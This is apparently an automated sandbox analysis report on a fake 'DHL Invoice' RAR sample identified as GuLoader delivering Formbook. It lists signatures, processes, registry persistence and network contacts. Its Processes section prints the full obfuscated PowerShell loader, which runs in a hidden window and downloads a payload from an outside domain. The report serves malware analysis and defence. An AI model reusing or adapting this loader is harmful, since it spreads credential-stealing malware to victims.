Malware Analysis Report

2024-10-19 09:28

Sample ID 240712-ljvhcsxfpn
Target 12072024_0934_11072024_DHL Invoice.rar
SHA256 8c03f35fb24c46bd75a0fafc7aae84dadc959bf407dea9a6959a7d0ef9f11ca0
Tags
execution formbook guloader dd01 downloader persistence rat spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

8c03f35fb24c46bd75a0fafc7aae84dadc959bf407dea9a6959a7d0ef9f11ca0

Threat Level: Known bad

The file 12072024_0934_11072024_DHL Invoice.rar was found to be: Known bad.

Malicious Activity Summary

execution formbook guloader dd01 downloader persistence rat spyware stealer trojan

Formbook

Guloader,Cloudeye

Formbook payload

Adds policy Run key to start application

Command and Scripting Interpreter: PowerShell

Blocklisted process makes network request

Reads user/profile data of web browsers

Suspicious use of NtSetInformationThreadHideFromDebugger

Suspicious use of SetThreadContext

Suspicious use of NtCreateThreadExHideFromDebugger

Suspicious use of UnmapMainImage

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: MapViewOfSection

Modifies Internet Explorer settings

Modifies registry class

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Suspicious use of FindShellTrayWindow

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-07-12 09:34

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-07-12 09:34

Reported

2024-07-12 09:36

Platform

win7-20240704-en

Max time kernel

148s

Max time network

150s

Command Line

cmd /c "C:\Users\Admin\AppData\Local\Temp\DHL.cmd"

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\DHL.cmd"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -windowstyle hidden "write 'Mandlige Kannibalismes Scalers Multimate38 Theologised77 Abrico Fibber Mjsom Forhandlersalg Sindssvages Xx Dybels Tarmkanalers Tel Backhaul Malacanthine Reaktionsevnes Pastoralerne handlelammet Chemotherapeuticness104 Fabrikatets Garewaite Atimy Problemomraaderne Mandlige Kannibalismes Scalers Multimate38 Theologised77 Abrico Fibber Mjsom Forhandlersalg Sindssvages Xx Dybels Tarmkanalers Tel Backhaul Malacanthine Reaktionsevnes Pastoralerne handlelammet Chemotherapeuticness104 Fabrikatets Garewaite Atimy Problemomraaderne';If (${host}.CurrentCulture) {$Truncus++;}$Euforisering='SUBsTR';$Euforisering+='ing';Function Bleens($Nedrakkes){$timetalsreduktionens=$Nedrakkes.Length-$Truncus;For( $Ryotwary=4;$Ryotwary -lt $timetalsreduktionens;$Ryotwary+=5){$Mandlige+=$Nedrakkes.$Euforisering.Invoke( $Ryotwary, $Truncus);}$Mandlige;}function Eddied($Handrail){ . ($Gidseltageres) ($Handrail);}$Personifikationers137=Bleens ' MetM DokoImmazFagmi,ryslIntrl Af.aBe,y/Brud5 Rec. eac0Vild ,up(ArusWReceiUs ln ispdStamoNodewF resCogn ,raaNPassT,pgj Stfo1Crib0 St,.Soap0Zi.c;Sind LesiWame.iSludn Nar6Resq4 tla;Refu SystxRavn6Spar4.rug;Skv. AarsrAl.avTil :Indv1Cero2Hold1Lemm.B.ar0Prog) .or TypGMa me G.mcWamakTilhoAnt./For,2Toet0 Fo.1.oin0Tr,d0Udle1Pred0Spyg1Micr UngeF D miHalvr JogeMandfSkolo Kilxfors/ ecu1E.tr2 In 1 rl.Re t0Tamt ';$Affaldsbrser171=Bleens 'RappUknigsGrimeBo drSkri-DdsbAUdvegD,apeBrodnMasttdi.u ';$Theologised77=Bleens 'Bog.h AentFiddtAtalp .nds Mon:Eman/Stng/Ussee H.mcswaroEndenBracsSladt Di,rSoutaLittm None CatdFatuioo.iaSu s.Fod,cGeneoklismor.h/MisdBUrovrKrisn Bude UdvbMancyRokkg Freg ,elesig.rSteriUn.e.D bbmVanvsUnbooSvig ';$Willowiness=Bleens 'Stet> ka ';$Gidseltageres=Bleens 'Eosii fodeResuxTew. ';$Fissens='Mjsom';$Strombus = Bleens ' PhieGlosc SkrhGe uo Af. Seks%G,una synpaffapS,led,ispa Gr tThecaDo t%Clod\SkruABenteMogur SkuoErhvsLiffotrailBesndLoneaAflaaKreds.upeeUndsn Non.AntiC CheoFeasmDest ,oot&Gr,g&Buni OutmeIn rcR,dehStnnoStaa DigetRt b ';Eddied (Bleens ' nc$ ling Ac,lTilbo Coeb undaBiv.l.sta: Un,CU,deoMiset BonaPo inA,ho=Kaza(AvescAerom.rridI.dt Indl/MagecJaco skep$La eS SubtThiur.maaoKr.kmLocobL.ukuUdsksbeto)Angl ');Eddied (Bleens 'Metr$.lfag Syml VedoUnd bCiana ScolVic.:MeshMsal uFaullT qut Quai Elym Wakaforbt ,abe S.i3Broi8.mso=Flet$ PetT Burh shae.yndoTam,l,rivoDev,g,roqiSsl sVoc e CondS ak7Prod7Oms,.Ceras M sp ,eclGloriA,metMel (Balm$SaimWAppliFjerl kralLateoSplewNortiSebanCoffeAmtssG.uns For) Men ');Eddied (Bleens 'Hemi[TornNParaeR iltN,ve.M.gnSTi,eeraffrTricvMu,ri ExocTatoe.issPBisto KoniArkinredet ,alMCapiaS.ymn b sa,illgVatne Knir Tsu]Bacc:Varv: LumSQ.areJordc S,puReshrU ntiSyn,tIne yLumbPK.agrB.gyoT.ixtOveroUnmucEngioFloelMad No,d= Sca cha [WhipNIm.ee atat Men.FusiSUmque.itacLatruAntir Inci By.tA.foy toaPEpi rSoveoBesmtTot o Autc OmboBarolIn,mT Pr yStr.pR seeFoug]F,rt:,ilo:SlgtTUndelBanas an1Blet2Zeuc ');$Theologised77=$Multimate38[0];$Nonmultiple= (Bleens 'dr.a$ negKatel,fflo NumbBjrnaEnchlMisk:DeteUSax hBaf yE,sfrgil lCambi P eg poreF li=AspiN Elaecamiw ys-o,taOUnfrb,ubij.ermeFunkcPiketTurd Ov rSChriyHumpsSnapt FaceNonvm Kul.FyriN ,ndeRekltJoe,. HolWClameBldtbDe eCMarslS ioiDisce ,vinPoget');$Nonmultiple+=$Cotan[1];Eddied ($Nonmultiple);Eddied (Bleens 'Vide$VideURenuh PrayS.itr semlUn,oi ud.g ared,oe. eksH OrleImplaVentd nineFaldrProds C.e[kaut$CrysAHenhfUntifFlora MurlPlend .hisQuo.bRemorSsygsRea.eDe irShi 1Ton.7Sup,1Glau]Soci=Fro,$VictPflj,eInd,r Ti s D poSprinUnc,ia,raf.ouriThank,okaaWintt HepiUnt.oTordnSt.aeDr grDatas Cul1 Sko3Cong7Prte ');$Unto=Bleens ' awk$UdpeUSugnhAccey Ba,rVa.olPyraiRidagForbeEn.e. Mi DSkruoRemaw FernVenalArreo HelaTilbd .ntF ConiAalelMataeTre.(Skot$Sl,mTrrinhSacreMegaoFredlGaaeoBiltg,ordi ertsAegtePa edImpa7 Sol7M.cr,H,rd$Sy.kGK.isa ,ndrP.eae,uglwFosfa holiIsogtSuleeHusu)F.rs ';$Garewaite=$Cotan[0];Eddied (Bleens 'Zoha$Ha,cgIndilMirio lkkbSil.aB jdl arr:CeteWL.pao BiloFolkd St.hFngseS.nswCha,eSp.irArie=Ford(FastTTelee FlasSkamtSyds-CurePSkibaSelvtY erhBrnd Pre,$AdlyGFirsagr.drPinkeTumlwProdaanteiSchitDeadeAar.)gett ');while (!$Woodhewer) {Eddied (Bleens 'Vamo$ForegServllivsoSmilbH,emaRenslLute:PurlGSkr,otensn igaesoppSpktoSohodD tr=Umbr$Mil,tBorerUn.lu refe Mac ') ;Eddied $Unto;Eddied (Bleens 'EfteS EndtUnbia orerGl,stMynd-UninSSmatlCrose Cale.aukpBesk Para4H,da ');Eddied (Bleens 'Di,e$Forkg NullA,tooK,nsbHoveaM,rdlIndd: mpWOutfoBesmoUnc,d .urh FuneD,arwropee,oleroct,=outb( DetTUniceRuins LovtAfsk-undkPRebeaB.sotPhonhUdra To,$ TabGNiv.aOlymrPrimeElsewPresaOrgaiBlovtWogheMa t)indk ') ;Eddied (Bleens 'Al.e$ Regg SkolUniooForgbRingaflukl M s: KakSGloscB odaRev.lDistePreer P.osSk,v=Iacc$ UvigTu.ilJerkoGulnbra taFej l Sti:CresKG,gsa A.bnBr,dnPo.ei GrnbProba nmlMissiIntesTrummE.eneCigascapi+Mynp+bolt%Endr$GabeMAtteu Si l s,stAndeiFab mnd naAtritBagge Kap3 Kom8Tapp. PrecGni oM tiuSkygnPopltinte ') ;$Theologised77=$Multimate38[$Scalers];}$Grafikindhold=298359;$demodulatorers=27193;Eddied (Bleens ' Skr$K ligken.lOogoo DypbR.vaaRevolDia :,onbFAilmoVerdr.owehFje.a AfbnBewidPredlHoroe GarrRemisDeteaTryplPre,g.nde Aage=Lykk IndlG F seU ertDo t-PlayCpolioFjednPaxitO,hoeForfntractAfd In.t$Pe cG.aviaEj.tr F reA ndwUvilaZymoiMartt UnieMale ');Eddied (Bleens 'Beau$conggAngil DaloV.jbbBalnaredil Cit:InteUKonfnPrecw uneiLithsKreshInv fVedhu gral am2Term3Hjem3Nonf Vaad=Snke Kok[ViiiSEndoyBrodsMyrrt itheM nom liz.JenfC N.do .rtn PalvStemeUmorrCelet Kr ]Alle:nest: ValFPlutrsk,ioK.udmbrubBGrana .ins B,geShor6r ar4F,rsSFuldtKan.r CabiJagenO.tagUnme(Py,a$ alF Tr.oHidfr SirhNoira Pr n,ackdBetylSupee AfvrAktisEntra,hadlLandg Ban)hftb ');Eddied (Bleens ' con$ nhegP lilBarwoAp,ebEm,saSnowl Par: ParDM inyClarbkiloe Cryl hipsAden Gri,=Ugem ill[TuliSEnvey CrasbogwtSc.tedambm ,mu.ProsT TareEscaxAntitB,ho. ShiE ,qunSel cLskuoDeted,apyiLgeknPresgSu.a] Gem:Funk:UnbeAKataSAminC,urtIdiabIu fo.frilGTidseRaftt S,eS ultQuarrRegaiTricnsiphg.lka( Bug$ SmaUBo,tnCondwSnici esosDaglhGoldfAppruT.aflInbo2 ag3Poly3Hero)Brea ');Eddied (Bleens ' dde$ alg o.glTrynoPentbPrveaSvinl,dst:TidsaKettlSvinbYmteiAfmrnAlfeiLiths Su.mbec.=T.yl$ KarDMurayGen.b dvie C olovers,ore. KnosAntruDuodbGenlsNon t eslr AssiScannBombgTur,( Wei$ KloGSkytrSkria tenf ciriKr lkNeweiG.ninCa.adMogohH poo katlTramdbrai, Je.$Zymod RudeOmsvmmarko abd S.tuPenglEnviap lotDragoGus r FabeTheer IndsBomb)Rini ');Eddied $albinism;"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Aerosoldaasen.Com && echo t"

Network

Country Destination Domain Proto
US 8.8.8.8:53 econstramedia.com udp
IN 103.211.216.55:443 econstramedia.com tcp
IN 103.211.216.55:443 econstramedia.com tcp
IN 103.211.216.55:443 econstramedia.com tcp
IN 103.211.216.55:443 econstramedia.com tcp
IN 103.211.216.55:443 econstramedia.com tcp
IN 103.211.216.55:443 econstramedia.com tcp
IN 103.211.216.55:443 econstramedia.com tcp
IN 103.211.216.55:443 econstramedia.com tcp
IN 103.211.216.55:443 econstramedia.com tcp
IN 103.211.216.55:443 econstramedia.com tcp
IN 103.211.216.55:443 econstramedia.com tcp
IN 103.211.216.55:443 econstramedia.com tcp
IN 103.211.216.55:443 econstramedia.com tcp
IN 103.211.216.55:443 econstramedia.com tcp
IN 103.211.216.55:443 econstramedia.com tcp
IN 103.211.216.55:443 econstramedia.com tcp
IN 103.211.216.55:443 econstramedia.com tcp
IN 103.211.216.55:443 econstramedia.com tcp
IN 103.211.216.55:443 econstramedia.com tcp
IN 103.211.216.55:443 econstramedia.com tcp
IN 103.211.216.55:443 econstramedia.com tcp
IN 103.211.216.55:443 econstramedia.com tcp
IN 103.211.216.55:443 econstramedia.com tcp
IN 103.211.216.55:443 econstramedia.com tcp
IN 103.211.216.55:443 econstramedia.com tcp
IN 103.211.216.55:443 econstramedia.com tcp
IN 103.211.216.55:443 econstramedia.com tcp
IN 103.211.216.55:443 econstramedia.com tcp
IN 103.211.216.55:443 econstramedia.com tcp
IN 103.211.216.55:443 econstramedia.com tcp
IN 103.211.216.55:443 econstramedia.com tcp
IN 103.211.216.55:443 econstramedia.com tcp
IN 103.211.216.55:443 econstramedia.com tcp
IN 103.211.216.55:443 econstramedia.com tcp
IN 103.211.216.55:443 econstramedia.com tcp
IN 103.211.216.55:443 econstramedia.com tcp
IN 103.211.216.55:443 econstramedia.com tcp
IN 103.211.216.55:443 econstramedia.com tcp
IN 103.211.216.55:443 econstramedia.com tcp
IN 103.211.216.55:443 econstramedia.com tcp
IN 103.211.216.55:443 econstramedia.com tcp
IN 103.211.216.55:443 econstramedia.com tcp
IN 103.211.216.55:443 econstramedia.com tcp
IN 103.211.216.55:443 econstramedia.com tcp
IN 103.211.216.55:443 econstramedia.com tcp
IN 103.211.216.55:443 econstramedia.com tcp
IN 103.211.216.55:443 econstramedia.com tcp
IN 103.211.216.55:443 econstramedia.com tcp
IN 103.211.216.55:443 econstramedia.com tcp
IN 103.211.216.55:443 econstramedia.com tcp
IN 103.211.216.55:443 econstramedia.com tcp
IN 103.211.216.55:443 econstramedia.com tcp
IN 103.211.216.55:443 econstramedia.com tcp
IN 103.211.216.55:443 econstramedia.com tcp
IN 103.211.216.55:443 econstramedia.com tcp
IN 103.211.216.55:443 econstramedia.com tcp
IN 103.211.216.55:443 econstramedia.com tcp
IN 103.211.216.55:443 econstramedia.com tcp

Files

memory/2496-4-0x000007FEF58FE000-0x000007FEF58FF000-memory.dmp

memory/2496-5-0x000000001B780000-0x000000001BA62000-memory.dmp

memory/2496-6-0x0000000001E70000-0x0000000001E78000-memory.dmp

memory/2496-11-0x000007FEF5640000-0x000007FEF5FDD000-memory.dmp

memory/2496-10-0x000007FEF5640000-0x000007FEF5FDD000-memory.dmp

memory/2496-9-0x000007FEF5640000-0x000007FEF5FDD000-memory.dmp

memory/2496-8-0x000007FEF5640000-0x000007FEF5FDD000-memory.dmp

memory/2496-7-0x000007FEF5640000-0x000007FEF5FDD000-memory.dmp

memory/2496-12-0x000007FEF5640000-0x000007FEF5FDD000-memory.dmp

memory/2496-13-0x000007FEF58FE000-0x000007FEF58FF000-memory.dmp

memory/2496-14-0x000007FEF5640000-0x000007FEF5FDD000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-07-12 09:34

Reported

2024-07-12 09:36

Platform

win10v2004-20240709-en

Max time kernel

147s

Max time network

143s

Command Line

C:\Windows\Explorer.EXE

Signatures

Formbook

trojan spyware stealer formbook

Guloader,Cloudeye

downloader guloader

Formbook payload

rat
Description Indicator Process Target
N/A N/A N/A N/A

Adds policy Run key to start application

persistence
Description Indicator Process Target
Key created \Registry\User\S-1-5-21-2650514177-1034912467-4025611726-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run C:\Windows\SysWOW64\svchost.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2650514177-1034912467-4025611726-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\X8AP1N18K8P = "C:\\Program Files (x86)\\Windows Photo Viewer\\ImagingDevices.exe" C:\Windows\SysWOW64\svchost.exe N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Reads user/profile data of web browsers

spyware stealer

Suspicious use of NtCreateThreadExHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe N/A
N/A N/A C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1984 set thread context of 2240 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe
PID 2240 set thread context of 3428 N/A C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe C:\Windows\Explorer.EXE
PID 3244 set thread context of 3428 N/A C:\Windows\SysWOW64\svchost.exe C:\Windows\Explorer.EXE

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \Registry\User\S-1-5-21-2650514177-1034912467-4025611726-1000\SOFTWARE\Microsoft\Internet Explorer\IntelliForms\Storage2 C:\Windows\SysWOW64\svchost.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ C:\Windows\Explorer.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe N/A
N/A N/A C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe N/A
N/A N/A C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe N/A
N/A N/A C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe N/A
N/A N/A C:\Windows\SysWOW64\svchost.exe N/A
N/A N/A C:\Windows\SysWOW64\svchost.exe N/A
N/A N/A C:\Windows\SysWOW64\svchost.exe N/A
N/A N/A C:\Windows\SysWOW64\svchost.exe N/A
N/A N/A C:\Windows\SysWOW64\svchost.exe N/A
N/A N/A C:\Windows\SysWOW64\svchost.exe N/A
N/A N/A C:\Windows\SysWOW64\svchost.exe N/A
N/A N/A C:\Windows\SysWOW64\svchost.exe N/A
N/A N/A C:\Windows\SysWOW64\svchost.exe N/A
N/A N/A C:\Windows\SysWOW64\svchost.exe N/A
N/A N/A C:\Windows\SysWOW64\svchost.exe N/A
N/A N/A C:\Windows\SysWOW64\svchost.exe N/A
N/A N/A C:\Windows\SysWOW64\svchost.exe N/A
N/A N/A C:\Windows\SysWOW64\svchost.exe N/A
N/A N/A C:\Windows\SysWOW64\svchost.exe N/A
N/A N/A C:\Windows\SysWOW64\svchost.exe N/A
N/A N/A C:\Windows\SysWOW64\svchost.exe N/A
N/A N/A C:\Windows\SysWOW64\svchost.exe N/A
N/A N/A C:\Windows\SysWOW64\svchost.exe N/A
N/A N/A C:\Windows\SysWOW64\svchost.exe N/A
N/A N/A C:\Windows\SysWOW64\svchost.exe N/A
N/A N/A C:\Windows\SysWOW64\svchost.exe N/A
N/A N/A C:\Windows\SysWOW64\svchost.exe N/A
N/A N/A C:\Windows\SysWOW64\svchost.exe N/A
N/A N/A C:\Windows\SysWOW64\svchost.exe N/A
N/A N/A C:\Windows\SysWOW64\svchost.exe N/A
N/A N/A C:\Windows\SysWOW64\svchost.exe N/A
N/A N/A C:\Windows\SysWOW64\svchost.exe N/A
N/A N/A C:\Windows\SysWOW64\svchost.exe N/A
N/A N/A C:\Windows\SysWOW64\svchost.exe N/A
N/A N/A C:\Windows\SysWOW64\svchost.exe N/A
N/A N/A C:\Windows\SysWOW64\svchost.exe N/A
N/A N/A C:\Windows\SysWOW64\svchost.exe N/A
N/A N/A C:\Windows\SysWOW64\svchost.exe N/A
N/A N/A C:\Windows\SysWOW64\svchost.exe N/A
N/A N/A C:\Windows\SysWOW64\svchost.exe N/A
N/A N/A C:\Windows\SysWOW64\svchost.exe N/A
N/A N/A C:\Windows\SysWOW64\svchost.exe N/A
N/A N/A C:\Windows\SysWOW64\svchost.exe N/A
N/A N/A C:\Windows\SysWOW64\svchost.exe N/A
N/A N/A C:\Windows\SysWOW64\svchost.exe N/A
N/A N/A C:\Windows\SysWOW64\svchost.exe N/A
N/A N/A C:\Windows\SysWOW64\svchost.exe N/A
N/A N/A C:\Windows\SysWOW64\svchost.exe N/A
N/A N/A C:\Windows\SysWOW64\svchost.exe N/A
N/A N/A C:\Windows\SysWOW64\svchost.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe N/A
N/A N/A C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe N/A
N/A N/A C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe N/A
N/A N/A C:\Windows\SysWOW64\svchost.exe N/A
N/A N/A C:\Windows\SysWOW64\svchost.exe N/A
N/A N/A C:\Windows\SysWOW64\svchost.exe N/A
N/A N/A C:\Windows\SysWOW64\svchost.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\svchost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of UnmapMainImage

Description Indicator Process Target
